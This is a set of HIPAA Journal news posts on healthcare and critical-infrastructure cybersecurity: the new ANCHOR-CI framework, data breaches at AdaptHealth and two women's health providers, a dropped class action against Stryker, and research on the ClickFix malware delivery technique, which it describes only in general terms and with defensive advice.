ANCHOR-CI Framework Strengthens Partnerships and Information Sharing to Secure Critical Infrastructure

The Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) has announced the formation of the Alliance of National Councils for Homeland Operational Resilience–Critical Infrastructure, or ANCHOR-CI for short. ANCHOR-CI will operate for two years initially but may be extended by DHS Secretary under the authority provided by Section 871 of the Homeland Security Act.

ANCHOR-CI is the successor to the Critical Infrastructure Partnership Advisory Council (CIPAC), which enabled critical infrastructure entities to exchange sensitive information with the federal government about physical and cyber risks. CIPAC was established by the DHS in March 2006 and served as the framework for public collaboration on security for almost two decades, until it was eliminated by then DHS Secretary Kristi Noem in March 2025. There has been no formal framework for government-industry coordination on critical infrastructure cybersecurity for more than a year, and without the legal protections provided by CIPAC or an equivalent framework, some critical infrastructure sectors stopped sharing cybersecurity data with the federal government.

ANCHOR-CI retains the legal protections of CIPAC and creates a new framework to strengthen information sharing and broaden partnerships across government and industry to better secure the nation’s critical infrastructure. “The new and innovative ANCHOR-CI framework will be a game changer in how the public and private sectors collaborate and share information,” said DHS Secretary Markwayne Mullin. “In a rapidly evolving threat environment, ANCHOR-CI will ensure we have the right people in the room working together to keep the critical infrastructure Americans rely on secure and resilient. This is just another example of the partnership needed to confront the threats of today and tomorrow.”

ANCHOR-CI allows the establishment of four council types: critical infrastructure sector councils, cross-sector councils, critical infrastructure industry councils, and regional coordinating councils, which will advise and provide strategic and actionable recommendations to ensure a coordinated national effort to strengthen critical infrastructure cybersecurity. The councils will recruit members from four groups: critical infrastructure owners, operators and their trade associations; federal, state, local, tribal and territorial government agencies; organizations with direct responsibility for cybersecurity and infrastructure resilience; and other private sector entities.

The new framework is more flexible than its predecessor, supports open and candid discussions of sensitive information, strengthens collaboration between the government and industry, and will ensure more critical infrastructure stakeholders participate. One key feature of CIPAC that has been dropped in ANCHOR-CI is liability protection for participants. This was an important feature that allowed executives to discuss incidents in group settings without antitrust or regulatory exposure.

Under the new framework, CISA will approve proposed council members and may appoint additional participants. Under CIPAC, private sector councils chose their own representatives. While some meetings can be opened to the public, sensitive discussions are shielded, as ANCHOR-CI is exempted from the Federal Advisory Committee Act.

Governance of the ANCHOR-CI councils will be managed by the DHS and CISA, and it will be housed by CISA, which will provide the necessary funding and administrative support. The HHS Office of Cybersecurity and Infrastructure Protection (CIP) will work closely with DHS and CISA to advance collaboration and ensure that the Healthcare and Public Health (HPH) sector priorities are elevated.  The ANCHOR-CI councils will help strengthen partnerships within the HPH sector, as well as across interdependent critical infrastructure sectors, including water and communications.

The post ANCHOR-CI Framework Strengthens Partnerships and Information Sharing to Secure Critical Infrastructure appeared first on The HIPAA Journal.

AdaptHealth Reports Material Cybersecurity Incident and Theft of Patient Data

AdaptHealth, a publicly traded healthcare company that provides home medical equipment, diabetes supplies, and sleep therapy products, has informed the U.S. Securities and Exchange Commission (SEC) that it is investigating a material cybersecurity incident involving unauthorized access to patient data.

According to the company’s Form 8-K filing, a threat actor contacted the company on June 15, 2026, claiming to have obtained files containing patient data. AdaptHealth launched an investigation, engaged third-party cybersecurity experts, and notified law enforcement. AdaptHealth has determined that certain cloud-based business applications were accessed by the threat actor, including internal patient management systems and document storage platforms. Files containing patients’ personally identifiable information (PII) and protected health information were exfiltrated by the threat actor.

The investigation is ongoing; however, AdaptHealth has determined that the unauthorized access occurred as a result of a response to a social engineering attack on a third-party contractor, which allowed the contractor’s credentials to be obtained. The threat actor obtained a stored password file tied to insurance billing and access to external electronic health record portals.

The affected account has been disabled, credentials have been reset, and additional access controls have been implemented. The incident has not had an impact on its operations or patient services, and a review is ongoing to determine the extent of data theft. The types of data involved have yet to be determined, and the number of affected individuals is currently unknown. AdaptHealth said it does not collect patients’ Social Security numbers, and financial account information and payment card information are not stored in the compromised systems.

AdaptHealth said it considers this to be a material cybersecurity incident due to the nature and potential volume of data at risk. The financial impact of the incident is still being assessed, with the company potentially having to cover costs associated with forensics, breach notification, legal and regulatory responses, and any remediation measures. The company holds a cybersecurity insurance policy, which may cover certain losses associated with the incident.

While AdaptHealth has not named the threat actor behind the attack, this appears to have been a data theft and extortion attempt by the ShinyHunters threat group. ShinyHunters added AdaptHealth to its data leak site and has threatened to leak the stolen data if the ransom is not paid, giving the company a final warning to pay or face a data leak.

The post AdaptHealth Reports Material Cybersecurity Incident and Theft of Patient Data appeared first on The HIPAA Journal.

Delaware & Florida Women’s Health Centers Announce Data Breaches

Two women’s healthcare providers have announced data privacy incidents. Women’s Wellness of Southern Delaware recently learned about unauthorized retention of patient data by a former provider of aesthetic services, and Women’s Center for Radiology has identified a hacking incident.

Women’s Wellness of Southern Delaware

Women’s Wellness of Southern Delaware, a Lewes, DE-based provider of obstetrics, gynecology, and facial aesthetic services, has recently learned that a former provider who rendered aesthetic services for the practice retained the protected health information of patients after engagement with the practice had terminated. Women’s Wellness of Southern Delaware was made aware of the data retention on April 28, 2026. The provider retained patients’ contact information and other patient-related information and is believed to have contacted certain patients to offer similar services at a new practice.

The information retained relates to certain recipients of aesthetic services and clinical services patients. For the aesthetic services patients, the information included their name, birth date, gender, email address, physical address, phone number, allergies, medications, supplements, and information related to the services received, which may include photographs, intake records, aesthetics-related medical history, face maps, dates of services and purchases, and descriptions of services or items purchased. For the clinical services recipients, the impacted data included name, phone number, dates of purchases, and descriptions of the items/medications purchased. The former provider did not have access to electronic medical records.

Women’s Wellness of Southern Delaware said it is in communication with the former provider and is seeking to obtain assurances that the data is returned or destroyed, and steps have been taken to enhance its data privacy and security measures to prevent similar incidents in the future. The incident is not currently shown on the HHS’ Office for Civil Rights breach portal, so it is currently unclear how many individuals have been affected.

Women’s Center for Radiology

Women’s Center for Radiology, a provider of medical imaging services at three locations in Orlando, Florida, has identified unauthorized access to parts of its network containing patient data. The unauthorized access was identified on or around April 28, 2026, and the forensic investigation determined that an unauthorized third party gained access to a limited part of its computer network. Files containing patient information were viewed or downloaded by the unauthorized third party.

Assisted by third-party specialists, Women’s Center for Radiology determined that the exposed files contained patient information such as names, addresses, dates of birth, contact information, diagnosis or condition, lab results, treating physician, medical record number, health insurance information, and driver’s license numbers.

Women’s Center for Radiology has started notifying the affected individuals, who have been offered complimentary credit monitoring and identity theft protection services. Women’s Center for Radiology is reviewing its policies, procedures, and protocols related to data privacy and security. Regulators have been notified about the incident; however, the number of affected individuals has not yet been publicly disclosed.

The post Delaware & Florida Women’s Health Centers Announce Data Breaches appeared first on The HIPAA Journal.

Employees Drop Class Action Lawsuit Against Stryker Over Hamdala Cyberattack

A consolidated class action lawsuit against the medtech company Stryker over a March 2026 cyberattack has been voluntarily dismissed by the plaintiffs, shortly after Stryker filed a motion to dismiss the lawsuit, alleging a lack of standing.

The Iranian hacktivist group Hamdala targeted Stryker in response to the military action in Iran by the United States and Israel. The hackers breached certain Stryker systems, stole around 50 terabytes of data, and permanently erased 12 petabytes of data on around 200,000 company devices. The attack caused considerable disruption, taking systems out of action for weeks.

Eight current and former Stryker employees took legal action against the company alleging that their personal information was compromised in the attack. The lawsuits started to be filed within hours of Stryker announcing the cyberattack, before Stryker had completed its investigation. While a significant amount of data was stolen in the attack, Stryker said its forensic investigation found no evidence to suggest that any of the plaintiffs’ data was compromised.

Stryker searched for the plaintiffs’ personally identifiable information (PII) in the compromised files and found the business email addresses of two of the plaintiffs, but no PII. None of the plaintiffs received a notification from Stryker informing them that their PII was involved, but despite that, the plaintiffs took legal action against the company seeking to represent a class of individuals whose PII was compromised. On June 22, 2026, Stryker filed a motion to dismiss the class action litigation.

In its motion to dismiss, Stryker said the employees started filing lawsuits 48 hours after the cyberattack was announced on March 11, 2026, and that they speculated that their names, Social Security numbers, unspecified financial account information, unspecified health insurance information, and unspecified driver’s license information were compromised in the incident. The plaintiffs asserted claims for negligence, negligence per se, breach of implied contract, intrusion upon seclusion, unjust enrichment, breach of confidence, and declaratory judgment.

Stryker said the plaintiffs vaguely alleged that they had been injured as a result of the incident; however, those injuries were theoretical. Six of the plaintiffs alleged that their PII had been misused, speculating that it was due to the cyberattack on Stryker, but they failed to allege sufficient detail to link the misuse of their data to the Stryker cyberattack. Stryker determined that their PII had been exposed in numerous prior data breaches, including their Social Security numbers. Two of the plaintiffs had their PII exposed in at least 20 prior data breaches.

Stryker maintains that the incident did not involve devices or systems connected to its customers, although the attack did impact its electronic ordering system and other related systems used by its clients. The cyberattack has been reported to the U.S. Securities and Exchange Commission (SEC); however, the company has not issued breach notifications to the HHS’ Office for Civil Rights or state attorneys general at the time of publication.

The eight class action lawsuits filed by employees were consolidated into a single action – In re Stryker Corporation Cyberattack Litigation – in the U.S. District Court for the Western District of Michigan, Southern Division. The plaintiffs opted to voluntarily dismiss the consolidated lawsuit on June 29, 2026. U.S. District Court Judge Hala Jarbou has signed an order dismissing the employees’ claims without prejudice. Should Stryker determine that the plaintiffs’ PII was compromised in the incident, the lawsuits can be refiled.

The post Employees Drop Class Action Lawsuit Against Stryker Over Hamdala Cyberattack appeared first on The HIPAA Journal.

ClickFix Social Engineering Technique is the Leading Method for Malware Delivery

The ClickFix social engineering technique is the leading method of malware delivery, according to an analysis by researchers at ReliaQuest. The researchers analyzed cyberattacks between March 1 and March 31, 2026, and found that attackers were most commonly exploiting trusted identities, devices, and tools in their attacks. This approach allows the attackers to hide their activities, which resemble normal user behavior, and bypass traditional perimeter and file scanning defenses.

The leading technique was ClickFix, which involves tricking users into pasting the attacker’s commands and scripts into trusted system dialogs, such as the Windows Run dialog. Pressing the Windows Key + R, launches the Run dialog, and the user is convinced to copy the supplied code into the dialog and execute it, having been tricked into thinking that the command will resolve an IT issue.

For instance, a user visits a website that triggers a pop-up, warning them that their browser contains a vulnerability or an image failed to load. They are told to click a button, which copies code, and then paste that command into the Run dialog and press Enter, thus executing the command. Other methods involve generating a fake CAPTCHA page, informing the user that they need to complete the test to verify they are human by pasting and running the command. That command launches PowerShell code that delivers the malware payload.

ReliaQuest researchers report that this technique is commonly used to deliver the NetSupport RAT, a remote access Trojan, and Deepload fileless malware, although they observed this technique being used to deliver a range of malware variants. This approach has also been used against MacOS users for the first time, delivering Atomic Stealer (AMOS), which can steal browser credentials, session cookies, cryptocurrency wallets, and keychain data.

ReliaQuest recommends companies add this method of attack to their security awareness training programs, warning employees not to paste commands into dialog boxes, such as Run, Terminal, or Script Editor, to consider restricting the use of the Run feature, restrict users from executing executable files, and use web filters to block pop-ups and prevent access to malicious websites.

The post ClickFix Social Engineering Technique is the Leading Method for Malware Delivery appeared first on The HIPAA Journal.